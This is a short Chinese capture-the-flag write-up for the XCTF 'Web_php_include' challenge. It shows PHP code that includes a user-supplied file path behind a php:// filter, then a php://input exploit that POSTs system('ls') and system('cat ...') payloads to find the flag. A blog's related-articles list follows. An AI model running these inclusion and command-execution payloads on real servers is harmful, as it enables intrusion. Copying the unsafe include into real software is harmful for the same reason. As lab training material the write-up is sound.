Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
给勒布朗上上对抗呀2 小时前
NginxDeny绕过-玄武杯2025-眼见不为实
ctf
蓝之白13 小时前
流量分析_SnakeBackdoor-1~6
web安全·ctf·流量分析·逆向分析
曲幽14 小时前
FastAPI + TinyDB并发陷阱与实战:告别数据错乱的解决方案
python·json·fastapi·web·并发·queue·lock·文件锁·tinydb
码界奇点1 天前
前端基础知识构建现代Web应用的基石
前端·青少年编程·web
Code Slacker1 天前
第八届传智杯AI WEB网页开发挑战赛练习题库
web·竞赛·传智杯
蓝之白1 天前
Web15-网站被黑
web安全·ctf
777sea1 天前
CTFSHOW-2026元旦跨年欢乐赛-CS2026
ctf
CC码码1 天前
迈向开源第一步,给fabric.js提PR
前端·javascript·开源·web·fabric
给勒布朗上上对抗呀1 天前
序列化绕过-攻防世界-unseping
ctf
闲人编程2 天前
FastAPIAdmin后台管理系统
python·接口·web·后台管理·admin·codecapsule·fast api